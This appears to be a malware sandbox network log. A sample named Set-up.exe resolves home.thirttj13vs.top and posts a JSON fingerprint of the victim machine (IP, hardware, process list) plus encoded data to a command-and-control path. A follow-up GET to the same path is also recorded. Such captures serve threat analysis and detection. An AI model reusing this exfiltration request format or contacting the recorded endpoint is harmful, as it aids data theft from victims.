                                  Jan 7, 2025 14:38:16.572282076 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572287083 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.572323084 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.572324991 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572335005 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572336912 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.572372913 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.572375059 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572385073 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572428942 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572438002 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572448015 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572510958 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572518110 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572525978 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572540045 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572547913 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572601080 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572608948 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572630882 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572638988 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572673082 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572680950 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572724104 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572731972 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572760105 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.572767019 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577038050 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577047110 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577104092 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577112913 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577142954 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577157974 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577197075 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577205896 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577235937 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.577239037 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577249050 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577284098 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.577284098 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:16.577289104 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577297926 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577325106 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577362061 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577420950 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577428102 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577466011 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577474117 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577512980 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577521086 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577536106 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577569008 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577600956 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577609062 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577657938 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577666998 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577702999 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577711105 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577752113 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577759027 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577805996 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577812910 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577841997 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577867031 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577876091 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577883959 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.577994108 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578001976 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578053951 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578062057 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578077078 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578114033 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578140020 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578149080 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578180075 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578188896 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578203917 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578747988 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578757048 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578788042 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578794956 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578830957 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.578839064 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583328962 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583347082 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583421946 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583431005 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583440065 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583448887 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583463907 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583471060 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583508015 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583515882 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583597898 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583607912 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583615065 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583622932 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583636999 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583645105 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583674908 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583683968 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583714962 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.583724022 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584187031 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584196091 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584227085 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584234953 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584311962 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584320068 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584352016 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584358931 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584414959 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584424019 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:16.584438086 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:19.094414949 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:19.094882011 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:19.099898100 CET804970634.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:19.101030111 CET4970680192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:19.703239918 CET4972180192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:19.707993984 CET804972134.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:19.708089113 CET4972180192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:19.708332062 CET4972180192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:19.713083982 CET804972134.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:20.363878965 CET804972134.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:20.364171982 CET4972180192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:20.369424105 CET804972134.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:20.369501114 CET4972180192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:20.377120972 CET4972453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:20.381913900 CET53497241.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:20.382004023 CET4972453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:20.382065058 CET4972453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:20.386781931 CET53497241.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:21.353293896 CET53497241.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:21.354289055 CET4972453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:21.354506016 CET4973380192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:21.359297037 CET53497241.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:21.359308004 CET804973334.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:21.359394073 CET4972453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:21.359411001 CET4973380192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:21.359623909 CET4973380192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:21.364391088 CET804973334.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:22.070503950 CET804973334.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:22.070792913 CET4973380192.168.2.534.147.147.173
                                  Jan 7, 2025 14:38:22.076997042 CET804973334.147.147.173192.168.2.5
                                  Jan 7, 2025 14:38:22.077061892 CET4973380192.168.2.534.147.147.173
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 7, 2025 14:38:00.979012966 CET6285153192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:00.979087114 CET6285153192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:00.985661983 CET53628511.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:00.985723972 CET53628511.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:15.403714895 CET6285653192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:15.403783083 CET6285653192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:16.071479082 CET53628561.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:16.071492910 CET53628561.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:19.101768017 CET5883253192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:19.101814032 CET5883253192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:19.574959993 CET53588321.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:19.702364922 CET53588321.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:20.370320082 CET5883453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:20.370366096 CET5883453192.168.2.51.1.1.1
                                  Jan 7, 2025 14:38:20.376842976 CET53588341.1.1.1192.168.2.5
                                  Jan 7, 2025 14:38:21.283931971 CET53588341.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 7, 2025 14:38:00.979012966 CET192.168.2.51.1.1.10xcaStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:00.979087114 CET192.168.2.51.1.1.10xb31dStandard query (0)httpbin.org28IN (0x0001)false
                                  Jan 7, 2025 14:38:15.403714895 CET192.168.2.51.1.1.10x740cStandard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:15.403783083 CET192.168.2.51.1.1.10x2dfcStandard query (0)home.thirttj13vs.top28IN (0x0001)false
                                  Jan 7, 2025 14:38:19.101768017 CET192.168.2.51.1.1.10xd0b1Standard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:19.101814032 CET192.168.2.51.1.1.10x9c19Standard query (0)home.thirttj13vs.top28IN (0x0001)false
                                  Jan 7, 2025 14:38:20.370320082 CET192.168.2.51.1.1.10x8377Standard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:20.370366096 CET192.168.2.51.1.1.10xf5b9Standard query (0)home.thirttj13vs.top28IN (0x0001)false
                                  Jan 7, 2025 14:38:20.382065058 CET192.168.2.51.1.1.10x8377Standard query (0)home.thirttj13vs.topA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 7, 2025 14:38:00.985723972 CET1.1.1.1192.168.2.50xcaNo error (0)httpbin.org50.19.58.113A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:00.985723972 CET1.1.1.1192.168.2.50xcaNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:00.985723972 CET1.1.1.1192.168.2.50xcaNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:00.985723972 CET1.1.1.1192.168.2.50xcaNo error (0)httpbin.org3.210.94.60A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:16.071479082 CET1.1.1.1192.168.2.50x740cNo error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:19.702364922 CET1.1.1.1192.168.2.50xd0b1No error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false
                                  Jan 7, 2025 14:38:21.353293896 CET1.1.1.1192.168.2.50x8377No error (0)home.thirttj13vs.top34.147.147.173A (IP address)IN (0x0001)false
                                  • httpbin.org
                                  • home.thirttj13vs.top
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.54970634.147.147.173804764C:\Users\user\Desktop\Set-up.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 7, 2025 14:38:16.080607891 CET12360OUTPOST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1
                                  Host: home.thirttj13vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 562088
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 34 33 32 33 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241958432312", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
                                  Jan 7, 2025 14:38:16.086291075 CET9888OUTData Raw: 59 44 74 62 65 44 62 39 56 50 42 6a 62 70 2b 65 63 51 65 4a 76 42 65 51 54 72 55 4d 62 6e 46 50 46 59 36 68 55 6e 53 71 35 66 6c 6b 58 6a 38 58 54 72 30 6d 34 31 4d 50 58 39 68 66 44 59 4f 76 43 7a 35 36 65 4f 78 47 47 6b 74 45 5c 2f 65 6c 46 50
                                  Data Ascii: YDtbeDb9VPBjbp+ecQeJvBeQTrUMbnFPFY6hUnSq5flkXj8XTr0m41MPX9hfDYOvCz56eOxGGktE\/elFP9N4Z8H\/EDiunh8VgMhrYPLsTTp16OaZxKOV4Krhq0YypYrDLE2xePw1WMounWy7C4yE03KLcYzlH5LH\/AC0\/H+tR1+ilj8GvhB4l0VRc+CJdAmeRmGo+EvFPiSDUEZSNse3xbf8AjPS5Lbg+ZH\/Zcdy4JCXsJ
                                  Jan 7, 2025 14:38:16.086354017 CET7416OUTData Raw: 42 7a 34 31 2b 47 72 44 78 58 34 57 38 49 5c 2f 46 48 34 4d 76 34 43 38 53 2b 4d 66 69 6a 34 72 47 67 65 50 5c 2f 32 66 66 46 6e 6a 58 56 46 69 2b 4c 48 6a 76 78 54 38 51 50 45 57 68 36 7a 71 75 6d 66 74 45 2b 44 64 47 31 33 54 34 74 55 38 58 36
                                  Data Ascii: Bz41+GrDxX4W8I\/FH4Mv4C8S+Mfij4rGgeP\/2ffFnjXVFi+LHjvxT8QPEWh6zqumftE+DdG13T4tU8X6rptqB4T01ZNFS1tb6G7uFuby6\/ls\/4KC\/szW37LXx3t\/B9nruha1beNPB1n8Sorbwz4T1bwb4e8NrrnifxZof\/AAjWjaTrnjn4ias2n2B8Mm5tri+8TXMwivlsxGqWaSzfr7cftreEIfAfwf1x\/wDgqP5UX
                                  Jan 7, 2025 14:38:16.086741924 CET6180OUTData Raw: 78 47 45 63 61 65 48 67 38 56 52 78 46 4f 4f 49 54 64 61 4a 2b 61 76 37 46 50 78 4d 2b 4a 76 78 47 38 46 5c 2f 47 49 65 4a 64 49 30 6a 54 5c 2f 68 31 6f 4e 36 6c 6a 38 4f 50 37 47 30 58 53 50 44 39 6e 70 67 6d 54 56 62 33 56 5c 2f 44 73 56 6a 70
                                  Data Ascii: xGEcaeHg8VRxFOOITdaJ+av7FPxM+JvxG8F\/GIeJdI0jT\/h1oN6lj8OP7G0XSPD9npgmTVb3V\/DsVjpFjZwXDWNrcaLd3M7DMFzfOqtKlwq2+1X6Y+JdH0pPDetxxafaW6tZXsp+zQR2xMsiM0khMCxlnkYlnZsl2JLZJr8\/J9BTBa3nKYydswyv\/AH8UAqB7oxx1Pr\/J2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5K
                                  Jan 7, 2025 14:38:16.091630936 CET2472OUTData Raw: 65 47 4d 4a 38 37 5c 2f 77 41 66 5c 2f 4c 58 5c 2f 41 44 5c 2f 6e 39 61 43 71 58 54 5c 2f 44 5c 2f 6b 51 2b 58 5c 2f 30 78 71 4b 54 38 2b 50 4e 5c 2f 31 76 57 70 5a 44 5c 2f 73 62 50 38 41 72 70 4c 2b 76 54 5c 2f 4f 4f 6c 4d 5c 2f 75 4a 74 6a 35
                                  Data Ascii: eGMJ87\/wAf\/LX\/AD\/n9aCqXT\/D\/kQ+X\/0xqKT8+PN\/1vWpZD\/sbP8ArpL+vT\/OOlM\/uJtj569vJ+lB3EMmz5H+4+f+evH+R27fhTPn++ib\/wDp3\/Afmf6cU4fcj\/8Aan\/Hx\/n1pp+87874\/wB15n+cnk\/SgPa\/3vw\/4BBt8tt\/\/bKKP\/P+e\/pUXlpH+5dP\/wBXf+g\/wq1JJ99B8\/ceZL+44\
                                  Jan 7, 2025 14:38:16.091742992 CET6180OUTData Raw: 38 33 7a 5c 2f 41 50 50 54 38 4b 66 4a 5c 2f 72 45 38 6e 5c 2f 6e 6c 62 79 5c 2f 61 50 4e 78 2b 76 5c 2f 31 36 68 6b 32 66 4d 37 70 35 50 37 33 79 76 33 6e 2b 65 5c 2f 31 7a 78 57 5a 6f 4d 33 65 58 76 63 49 4e 5c 2f 6d 6a 39 33 5c 2f 7a 32 2b 6e
                                  Data Ascii: 83z\/APPT8KfJ\/rE8n\/nlby\/aPNx+v\/16hk2fM7p5P73yv3n+e\/1zxWZoM3eXvcIN\/mj93\/z2+n8v88m15PnTzN\/Mn+tP773tLQU9cqyIj73\/ANb5kkv+ecZqItz9\/ZCZf3v\/ADwzn\/PT8vTT2fn+H\/BOg\/d2isTxJr1n4Y0PUtf1A4stLtzc3B3BcRh1T7xBA5cc4Ndt8U9I0b4V3HxEtJfiv8G\/iHe\/Br
                                  Jan 7, 2025 14:38:16.135320902 CET27192OUTData Raw: 68 4a 5c 2f 68 70 4e 70 48 78 48 76 39 55 68 38 4a 57 39 78 70 5c 2f 68 58 78 4e 34 56 4e 78 59 4c 72 58 69 54 52 74 48 76 50 34 75 38 51 50 43 6a 36 4a 5c 2f 69 31 78 72 6e 58 48 6d 5a 63 5a 5a 33 6c 33 45 32 63 7a 79 5c 2f 42 5a 2b 2b 46 2b 4a
                                  Data Ascii: hJ\/hpNpHxHv9Uh8JW9xp\/hXxN4VNxYLrXiTRtHvP4u8QPCj6J\/i1xrnXHmZcZZ3l3E2czy\/BZ++F+Js6ymjm+PyhZdwrl+LxGVywWIpVcwVGOU8P0sVgaNNY6GAoYZLEVsDiJQ\/wBOPCH6Uf06fAfwn4Q8IMJ4U+HPGPAfBFPO8ZwNPxL8NOGeKcx4TyPinG5t4hZxkmX8S0cyy7G0+H55tmXEHGlTK82xeKWU4viXG4+L
                                  Jan 7, 2025 14:38:16.187180042 CET13596OUTData Raw: 32 7a 5c 2f 4b 73 77 6c 68 35 32 62 70 7a 78 4f 58 34 61 63 31 61 53 68 79 74 4e 5c 2f 37 4e 63 4b 66 36 4f 64 39 4c 54 69 58 68 33 4a 38 2b 7a 44 6a 37 77 66 34 4c 78 6d 61 34 47 68 6a 61 5c 2f 43 5c 2f 46 58 45 48 46 48 2b 73 57 53 79 72 77 6a
                                  Data Ascii: 2z\/Kswlh52bpzxOX4ac1aShytN\/7NcKf6Od9LTiXh3J8+zDj7wf4Lxma4Ghja\/C\/FXEHFH+sWSyrwjU+o5uuGuBeJMkhjqSlavSwGd5hSpTvTdbnjJR\/VZ\/DfiLH\/ACANa6\/9Aq+9D\/0woPhvxF\/0BNa\/DS77+kA\/lX5U\/wDDwX9sX\/ouOv8A\/gk8H\/8AzOUf8PBf2xf+i46\/\/wCCTwf\/APM5Xl\/8VX
                                  Jan 7, 2025 14:38:16.235168934 CET1236OUTData Raw: 35 5c 2f 6f 68 74 52 79 64 76 78 5c 2f 70 55 6c 52 79 64 76 78 5c 2f 70 51 57 52 30 6a 41 74 2b 65 61 54 35 5c 2f 39 6e 39 61 50 6e 5c 2f 32 66 31 6f 4f 67 62 35 66 76 2b 6e 5c 2f 31 36 67 38 76 35 73 64 73 39 50 66 30 5c 2f 77 44 72 5c 2f 77 44
                                  Data Ascii: 5\/ohtRydvx\/pUlRydvx\/pQWR0jAt+eaT5\/9n9aPn\/2f1oOgb5fv+n\/16g8v5sds9Pf0\/wDr\/wD66t1XkXsPqP8ACguG\/wAv1RXo27uMVJ5fv+n\/ANejy\/f9P\/r0HRzvy\/r5lfy\/f9P\/AK9R1c8v3\/T\/AOvUPlezfl\/9atPaeX4\/8A1IaZsHv\/n8Kt1H5fv+n\/16r2vnL+vmaU6m2vz\/AEf9dinJH0
                                  Jan 7, 2025 14:38:16.283278942 CET1236OUTData Raw: 64 76 38 5c 2f 35 5c 2f 72 6d 66 5a 2b 66 34 66 38 45 37 50 61 65 58 34 5c 2f 77 44 41 49 70 4e 6e 7a 5c 2f 36 76 32 5c 2f 38 41 72 65 5c 2f 31 37 31 56 5c 2f 31 5a 33 37 49 33 5c 2f 36 61 66 38 41 4c 41 5c 2f 35 5c 2f 77 41 50 77 75 48 5a 5c 2f
                                  Data Ascii: dv8\/5\/rmfZ+f4f8E7PaeX4\/wDAIpNnz\/6v2\/8Are\/171V\/1Z37I3\/6af8ALA\/5\/wAPwuHZ\/f3vJ\/y0j\/6+sf8A6vfp1pjRpHv3x7Mn\/WSY5\/8Ar+lHs\/P8P+CaUvs\/P9ShJI7Kf7gx5X8\/880TfvPOR0\/66+Xz\/X68+tPkP3NnmeT\/AMsvL\/1GO\/8An8qZIvltNl\/k\/wBaP8f8+w6GtDsp9fl+
                                  Jan 7, 2025 14:38:16.331276894 CET1236OUTData Raw: 31 4c 2b 50 72 31 5c 2f 79 63 55 5c 2f 35 31 6a 54 2b 50 39 31 2b 76 47 66 38 41 50 53 6e 5c 2f 41 43 4e 39 39 70 45 7a 2b 36 2b 54 39 5c 2f 37 66 34 66 34 30 47 78 57 5c 2f 31 6d 2b 54 4f 5c 2f 7a 50 33 55 76 37 33 79 50 50 36 5a 5c 2f 7a 2b 4e
                                  Data Ascii: 1L+Pr1\/ycU\/51jT+P91+vGf8APSn\/ACN99pEz+6+T9\/7f4f40GxW\/1m+TO\/zP3Uv73yPP6Z\/z+NMkj\/jdC6f8tc\/56ipmjh2p8kqfvf3Ukkv7+H\/63+R3p\/8Aq13\/AOkb\/wDlrv8AtXkf4f8A180AV5P+2kycSSx+V5EH5VHuh\/uR7PNxn8fXP6VNJ80juid\/K\/1v7j\/Dv6\/hTGZPk3\/Z9kn2fp9O93\
                                  Jan 7, 2025 14:38:19.094414949 CET138INHTTP/1.1 200 OK
                                  server: nginx/1.22.1
                                  date: Tue, 07 Jan 2025 13:38:18 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.54972134.147.147.173804764C:\Users\user\Desktop\Set-up.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 7, 2025 14:38:19.708332062 CET100OUTGET /jhkNTMUXVuSQJmAfrHzR1736163221?argument=0 HTTP/1.1
                                  Host: home.thirttj13vs.top
                                  Accept: */*
                                  Jan 7, 2025 14:38:20.363878965 CET353INHTTP/1.1 404 NOT FOUND
                                  server: nginx/1.22.1
                                  date: Tue, 07 Jan 2025 13:38:20 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 207
